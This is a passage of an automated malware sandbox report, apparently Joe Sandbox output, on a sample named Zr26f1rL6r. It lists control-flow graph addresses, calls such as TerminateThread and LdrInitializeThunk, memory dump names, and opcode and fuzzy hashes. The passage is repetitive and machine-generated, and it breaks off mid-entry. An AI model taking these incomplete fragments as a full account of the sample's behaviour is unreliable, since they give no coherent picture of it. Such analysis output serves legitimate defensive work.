                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 331 1e902b10-1e902b1c LdrInitializeThunk
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: f4c4a943680d92242cd4cb896e40895d40fe338452a086c80777512566ae9ecc
                                                                                                                          • Instruction ID: d33fa5c37a326be5c19dd8b551659233c03c720797e22f55358aa4d7ab6fc8dd
                                                                                                                          • Opcode Fuzzy Hash: f4c4a943680d92242cd4cb896e40895d40fe338452a086c80777512566ae9ecc
                                                                                                                          • Instruction Fuzzy Hash: CA90023120110C02D5907259450468E505547D1711FD1C55DA0115E14DCA258A5A7BA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 330 1e9029f0-1e9029fc LdrInitializeThunk
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: c71b4aad30ced3dc59c8f37319a0e0cd194834e4ebefc08198b8e9a35211454d
                                                                                                                          • Instruction ID: 4ba9be49c5e33344a572c3537d658b19b1e43256dff38e4e59a86ba1a3c8b056
                                                                                                                          • Opcode Fuzzy Hash: c71b4aad30ced3dc59c8f37319a0e0cd194834e4ebefc08198b8e9a35211454d
                                                                                                                          • Instruction Fuzzy Hash: FE900225211104030515A659070454B509647D5761391C569F1105D10CD63188627521
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: c5b57f390ff2f98210ecfe177ca7e8d656d1977e797501b417f4bb8d8dda1d34
                                                                                                                          • Instruction ID: db2c4248d5404f79a7d1b4065e89b9d1098c439bb24d606e8c7f03264c7343c9
                                                                                                                          • Opcode Fuzzy Hash: c5b57f390ff2f98210ecfe177ca7e8d656d1977e797501b417f4bb8d8dda1d34
                                                                                                                          • Instruction Fuzzy Hash: 9A90023160520802D5106259461474A605547D0611FA1C959A0514D28DC7A5895279A2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 5734b2-5734b4 1 5734b6 0->1 2 573453-57348d TerminateThread 0->2 4 5734cf-5734e0 1->4 2->4 5 5734e6-57353b 4->5 6 5736ca-573733 4->6 5->6 11 573541-573545 5->11 11->6 12 57354b-57354f 11->12 12->6 14 573555-573559 12->14 14->6 15 57355f-573563 14->15 15->6 16 573569-57356d 15->16 16->6 17 573573-573581 16->17 17->6 18 573587-5735e8 17->18 21 5735e9-5735fd 18->21 22 573672-5736b2 21->22 23 5735ff-573603 21->23 23->6 24 573609-573669 23->24 24->21
                                                                                                                          APIs
                                                                                                                          • TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: TerminateThread
                                                                                                                          • String ID: E
                                                                                                                          • API String ID: 1852365436-3568589458
                                                                                                                          • Opcode ID: 63d5c529f23e53e931f4f2f2cf9a2ebbdab40d1d37f1ddddca4661f2912cd43b
                                                                                                                          • Instruction ID: e06e5f0cc90130f863966da052ae868b359883ca75b051dd20f79d12ad0fa1be
                                                                                                                          • Opcode Fuzzy Hash: 63d5c529f23e53e931f4f2f2cf9a2ebbdab40d1d37f1ddddca4661f2912cd43b
                                                                                                                          • Instruction Fuzzy Hash: A821E434604703DFDF288A24E494B713B92BF61330F59C669D8994B1B1C7B5DAC5FA12
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 27 57333d-57338e 28 573391-5733ac 27->28 30 5733ae-5734e0 TerminateThread 28->30 35 5734e6-57353b 30->35 36 5736ca-573733 30->36 35->36 41 573541-573545 35->41 41->36 42 57354b-57354f 41->42 42->36 44 573555-573559 42->44 44->36 45 57355f-573563 44->45 45->36 46 573569-57356d 45->46 46->36 47 573573-573581 46->47 47->36 48 573587-5735e8 47->48 51 5735e9-5735fd 48->51 52 573672-5736b2 51->52 53 5735ff-573603 51->53 53->36 54 573609-573669 53->54 54->51
                                                                                                                          APIs
                                                                                                                          • TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: TerminateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1852365436-0
                                                                                                                          • Opcode ID: 125437f74862e5e28ab0772b533dd6d3f30904ea1bf012cafa73c3a7be8dc623
                                                                                                                          • Instruction ID: 81e88b84a1b3d38dd1934b66176d655dac27a842423d0ee6ba4a77e8f8263f2d
                                                                                                                          • Opcode Fuzzy Hash: 125437f74862e5e28ab0772b533dd6d3f30904ea1bf012cafa73c3a7be8dc623
                                                                                                                          • Instruction Fuzzy Hash: AC4147746043029FDF288A24D5F47FA3BA2BF51360F68C46ADC898B261D775C985E612
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 57 5733d6-5733d8 58 573377-57338e 57->58 59 5733da 57->59 60 573391-5733ac 58->60 61 573419-5734e0 TerminateThread 59->61 64 5733ae-5733d3 60->64 67 5734e6-57353b 61->67 68 5736ca-573733 61->68 64->61 67->68 73 573541-573545 67->73 73->68 74 57354b-57354f 73->74 74->68 76 573555-573559 74->76 76->68 77 57355f-573563 76->77 77->68 78 573569-57356d 77->78 78->68 79 573573-573581 78->79 79->68 80 573587-5735e8 79->80 83 5735e9-5735fd 80->83 84 573672-5736b2 83->84 85 5735ff-573603 83->85 85->68 86 573609-573669 85->86 86->83
                                                                                                                          APIs
                                                                                                                          • TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: TerminateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1852365436-0
                                                                                                                          • Opcode ID: b3c4b9811dfd1512c561d12559520c044dd10e5bd42b9ee0975b3a363486aa53
                                                                                                                          • Instruction ID: 1f2c1d87d4b2014dc722f200a29d411e7eba24aa5dfa2799d0b99ea94f146659
                                                                                                                          • Opcode Fuzzy Hash: b3c4b9811dfd1512c561d12559520c044dd10e5bd42b9ee0975b3a363486aa53
                                                                                                                          • Instruction Fuzzy Hash: 3E410630604743DFDF248A24E4E47A53BA2BF51320F58C56AD8898B2B1C7758A85E712
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 89 5733e2-5733e4 90 5733e6 89->90 91 573383-57338e 89->91 93 573419-5734e0 TerminateThread 90->93 92 573391-5733ac 91->92 96 5733ae-5733d3 92->96 99 5734e6-57353b 93->99 100 5736ca-573733 93->100 96->93 99->100 105 573541-573545 99->105 105->100 106 57354b-57354f 105->106 106->100 108 573555-573559 106->108 108->100 109 57355f-573563 108->109 109->100 110 573569-57356d 109->110 110->100 111 573573-573581 110->111 111->100 112 573587-5735e8 111->112 115 5735e9-5735fd 112->115 116 573672-5736b2 115->116 117 5735ff-573603 115->117 117->100 118 573609-573669 117->118 118->115
                                                                                                                          APIs
                                                                                                                          • TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: TerminateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1852365436-0
                                                                                                                          • Opcode ID: 61ad056e913c5e7134c1f6e3c7f34bfeb502a26143b022ac41dc82b3c98f9414
                                                                                                                          • Instruction ID: 171d67efcfd1c18b1442dce96417befe3a6b5f09e9eb105c31319bc25a22f3b6
                                                                                                                          • Opcode Fuzzy Hash: 61ad056e913c5e7134c1f6e3c7f34bfeb502a26143b022ac41dc82b3c98f9414
                                                                                                                          • Instruction Fuzzy Hash: 3A410674604743DFDF248A24E8E47E53BA2BF51320F58C56AD8898B2B2C7758A85E712
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 121 5733ee-5733f0 122 5733f2 121->122 123 57338f 121->123 124 573419-5734e0 TerminateThread 122->124 125 573391-5733ac 123->125 131 5734e6-57353b 124->131 132 5736ca-573733 124->132 128 5733ae-5733d3 125->128 128->124 131->132 137 573541-573545 131->137 137->132 138 57354b-57354f 137->138 138->132 140 573555-573559 138->140 140->132 141 57355f-573563 140->141 141->132 142 573569-57356d 141->142 142->132 143 573573-573581 142->143 143->132 144 573587-5735e8 143->144 147 5735e9-5735fd 144->147 148 573672-5736b2 147->148 149 5735ff-573603 147->149 149->132 150 573609-573669 149->150 150->147
                                                                                                                          APIs
                                                                                                                          • TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: TerminateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1852365436-0
                                                                                                                          • Opcode ID: 6546bd2b17dc53c65de12f6bd8f5f24a3b2dcc47d6e6e1e7e90597dc7f786622
                                                                                                                          • Instruction ID: 25f29b0cdc27949813feb2ba1fe3e18bf9372954b0356c91f0d9a1cda50174f0
                                                                                                                          • Opcode Fuzzy Hash: 6546bd2b17dc53c65de12f6bd8f5f24a3b2dcc47d6e6e1e7e90597dc7f786622
                                                                                                                          • Instruction Fuzzy Hash: 89410530604703DFDF288A24E4E47E53B927F51320F58C56AD88D8B2B1C7758A85E612
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 153 573388-57338e 154 573391-5733ac 153->154 156 5733ae-5734e0 TerminateThread 154->156 161 5734e6-57353b 156->161 162 5736ca-573733 156->162 161->162 167 573541-573545 161->167 167->162 168 57354b-57354f 167->168 168->162 170 573555-573559 168->170 170->162 171 57355f-573563 170->171 171->162 172 573569-57356d 171->172 172->162 173 573573-573581 172->173 173->162 174 573587-5735e8 173->174 177 5735e9-5735fd 174->177 178 573672-5736b2 177->178 179 5735ff-573603 177->179 179->162 180 573609-573669 179->180 180->177
                                                                                                                          APIs
                                                                                                                          • TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: TerminateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1852365436-0
                                                                                                                          • Opcode ID: 78171d6344f409d0b688c5e62183191793c4e89cb09b12b0817efa050e77702a
                                                                                                                          • Instruction ID: b28c300884c0857b334c3795f035475b6de42a873c0ef5697d0130467c8e6706
                                                                                                                          • Opcode Fuzzy Hash: 78171d6344f409d0b688c5e62183191793c4e89cb09b12b0817efa050e77702a
                                                                                                                          • Instruction Fuzzy Hash: DF411630604707DFDF388E24E4E47E53BA2BF51360F68C46AD88D4B2B5C7758A85EA11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 183 573406-573408 184 5733a7-5733a8 183->184 185 57340a 183->185 186 5733ac 184->186 187 5733aa 184->187 188 573419-5734e0 TerminateThread 185->188 190 573391-5733a6 186->190 191 5733ae-5733d3 186->191 187->186 194 5734e6-57353b 188->194 195 5736ca-573733 188->195 190->186 191->188 194->195 200 573541-573545 194->200 200->195 201 57354b-57354f 200->201 201->195 203 573555-573559 201->203 203->195 204 57355f-573563 203->204 204->195 205 573569-57356d 204->205 205->195 206 573573-573581 205->206 206->195 207 573587-5735e8 206->207 210 5735e9-5735fd 207->210 211 573672-5736b2 210->211 212 5735ff-573603 210->212 212->195 213 573609-573669 212->213 213->210
                                                                                                                          APIs
                                                                                                                          • TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: TerminateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1852365436-0
                                                                                                                          • Opcode ID: a1ff5e52645c960b16ee0a9ca3ca655f4cb11f053120e37012fe301f9dd075e5
                                                                                                                          • Instruction ID: 062d737e1cad28337dd41ab295fa52f30df6332ed084b50bbb462fed92827bb3
                                                                                                                          • Opcode Fuzzy Hash: a1ff5e52645c960b16ee0a9ca3ca655f4cb11f053120e37012fe301f9dd075e5
                                                                                                                          • Instruction Fuzzy Hash: A3311530604703DFDF288A24E4E47A53B927F61330F68C56AD88D8B2B1C775DA85E602
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 216 573412-573414 217 573416 216->217 218 5733b3-5733d3 216->218 219 573419-5734e0 TerminateThread 217->219 218->219 223 5734e6-57353b 219->223 224 5736ca-573733 219->224 223->224 229 573541-573545 223->229 229->224 230 57354b-57354f 229->230 230->224 232 573555-573559 230->232 232->224 233 57355f-573563 232->233 233->224 234 573569-57356d 233->234 234->224 235 573573-573581 234->235 235->224 236 573587-5735e8 235->236 239 5735e9-5735fd 236->239 240 573672-5736b2 239->240 241 5735ff-573603 239->241 241->224 242 573609-573669 241->242 242->239
                                                                                                                          APIs
                                                                                                                          • TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: TerminateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1852365436-0
                                                                                                                          • Opcode ID: be6cd48f64895fb72b5b8cbc0af970b75381a7680b2e0b5917ba3e732d55ea7c
                                                                                                                          • Instruction ID: 2d62a514b1bf428d94753223b153ea3e1b4991c63798305a7d9ad45485d87db8
                                                                                                                          • Opcode Fuzzy Hash: be6cd48f64895fb72b5b8cbc0af970b75381a7680b2e0b5917ba3e732d55ea7c
                                                                                                                          • Instruction Fuzzy Hash: 35312834604703DFDF288A24E4E47B53B927F11330F58C56AC8898B2B5CBB59AC5F612
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 245 57349a-57349c 246 57349e 245->246 247 57343b-57348d TerminateThread 245->247 248 5734cf-5734e0 246->248 247->248 250 5734e6-57353b 248->250 251 5736ca-573733 248->251 250->251 256 573541-573545 250->256 256->251 257 57354b-57354f 256->257 257->251 259 573555-573559 257->259 259->251 260 57355f-573563 259->260 260->251 261 573569-57356d 260->261 261->251 262 573573-573581 261->262 262->251 263 573587-5735e8 262->263 266 5735e9-5735fd 263->266 267 573672-5736b2 266->267 268 5735ff-573603 266->268 268->251 269 573609-573669 268->269 269->266
                                                                                                                          APIs
                                                                                                                          • TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: TerminateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1852365436-0
                                                                                                                          • Opcode ID: 1c24800eede04b719aec2b2ecba1c30bf5f358b382f44212fdf96ca442d5a270
                                                                                                                          • Instruction ID: 23c92cd02286c00be9eb3ed1bd3ff85660d5c883933e8203284458367a29ef6b
                                                                                                                          • Opcode Fuzzy Hash: 1c24800eede04b719aec2b2ecba1c30bf5f358b382f44212fdf96ca442d5a270
                                                                                                                          • Instruction Fuzzy Hash: 3B21F734600703DFDF288A54E4A47B13B927F61330F58C6A9D8494B2B5C7B5DAC5FA02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 272 5734a6-5734a8 273 573447-57348d TerminateThread 272->273 274 5734aa 272->274 276 5734cf-5734e0 273->276 274->276 277 5734e6-57353b 276->277 278 5736ca-573733 276->278 277->278 283 573541-573545 277->283 283->278 284 57354b-57354f 283->284 284->278 286 573555-573559 284->286 286->278 287 57355f-573563 286->287 287->278 288 573569-57356d 287->288 288->278 289 573573-573581 288->289 289->278 290 573587-5735e8 289->290 293 5735e9-5735fd 290->293 294 573672-5736b2 293->294 295 5735ff-573603 293->295 295->278 296 573609-573669 295->296 296->293
                                                                                                                          APIs
                                                                                                                          • TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: TerminateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1852365436-0
                                                                                                                          • Opcode ID: 39a6760cc7d4d8892dd3c7a2f0646666962e25ef3eb500e301e9c69426d3103b
                                                                                                                          • Instruction ID: f33f86f3c71a3cb35021e993f4535f8186441daa43e4a19da51a3a379e37973a
                                                                                                                          • Opcode Fuzzy Hash: 39a6760cc7d4d8892dd3c7a2f0646666962e25ef3eb500e301e9c69426d3103b
                                                                                                                          • Instruction Fuzzy Hash: D721E634600703DFDF288A14E4A47753B927F61330F69C669D8894B1B5C7B5DAC5FA12
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 299 5734be-5734c0 300 5734c2 299->300 301 57345f-573483 TerminateThread 299->301 302 5734cf-5734e0 300->302 303 573489-57348d 301->303 304 5734e6-57353b 302->304 305 5736ca-573733 302->305 303->302 304->305 310 573541-573545 304->310 310->305 311 57354b-57354f 310->311 311->305 313 573555-573559 311->313 313->305 314 57355f-573563 313->314 314->305 315 573569-57356d 314->315 315->305 316 573573-573581 315->316 316->305 317 573587-5735e8 316->317 320 5735e9-5735fd 317->320 321 573672-5736b2 320->321 322 5735ff-573603 320->322 322->305 323 573609-573669 322->323 323->320
                                                                                                                          APIs
                                                                                                                          • TerminateThread.KERNEL32(8D6E7AD5,5C7784AB), ref: 00573463
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47938849915.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_573000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: TerminateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1852365436-0
                                                                                                                          • Opcode ID: b0989963749050af7da597dab5a4501b16fe4c8859b8752bb32cf4986257bee9
                                                                                                                          • Instruction ID: 745370d4b4866394ed8d46c72abdf14a73998ebc1cc2391fe8a50cc6eba4c1c6
                                                                                                                          • Opcode Fuzzy Hash: b0989963749050af7da597dab5a4501b16fe4c8859b8752bb32cf4986257bee9
                                                                                                                          • Instruction Fuzzy Hash: 6C21D324604703DFDB298A24E4A47713B927F61330F59C6A9C8894B1B2C7B5DAC5FA12
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 326 1e902b2a-1e902b2f 327 1e902b31-1e902b38 326->327 328 1e902b3f-1e902b46 LdrInitializeThunk 326->328
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 591ecb46f3b696bbd7fc92c41e540128dfed4d8423c03c3ffdae074bc44e496d
                                                                                                                          • Instruction ID: ef60feb8b853f9cd6757ad96f070d91511f355abfcdc48318bf9987e0c47b71b
                                                                                                                          • Opcode Fuzzy Hash: 591ecb46f3b696bbd7fc92c41e540128dfed4d8423c03c3ffdae074bc44e496d
                                                                                                                          • Instruction Fuzzy Hash: 06B02B31C010C5C5D601D720070870B790827C0B00F61C19AD1020E40F4338C081F531
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                          • API String ID: 3446177414-1700792311
                                                                                                                          • Opcode ID: cabe086e8183d9b3b171b4fa236741beb66b66e3caf8fa7e4aa623babc191c72
                                                                                                                          • Instruction ID: 812e4829ed0211e6a754690f15f2b1de98171c74cce73d986ee4a82497f96b93
                                                                                                                          • Opcode Fuzzy Hash: cabe086e8183d9b3b171b4fa236741beb66b66e3caf8fa7e4aa623babc191c72
                                                                                                                          • Instruction Fuzzy Hash: C0D11239904685EFCB12CFA8C490AAEBBF6FF4A710F048A4DE4459B352D735A985DF10
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                          • API String ID: 3446177414-3224558752
                                                                                                                          • Opcode ID: 557d78c181ac45487b84f557548674ddcf0f8bdb5ff4548cd2927773c7acff46
                                                                                                                          • Instruction ID: 6e871eec676cd83dad7956fbe2f10f15a861e5998667847421b181f519f39de8
                                                                                                                          • Opcode Fuzzy Hash: 557d78c181ac45487b84f557548674ddcf0f8bdb5ff4548cd2927773c7acff46
                                                                                                                          • Instruction Fuzzy Hash: E6412931D14686EFDB22DF68C894B9AB3A9EF42314F004B6DD406677C5C778A984CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true
                                                                                                                          • Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                          • API String ID: 3446177414-1222099010
                                                                                                                          • Opcode ID: 347d704be55f6460ef29cb0cb275689b6a6170506fd424844f61f1062ad29f08
                                                                                                                          • Instruction ID: ae392bc9c4905dbff404ee754806cbb36cb8b576f74d8a4709852a07a2a9688a
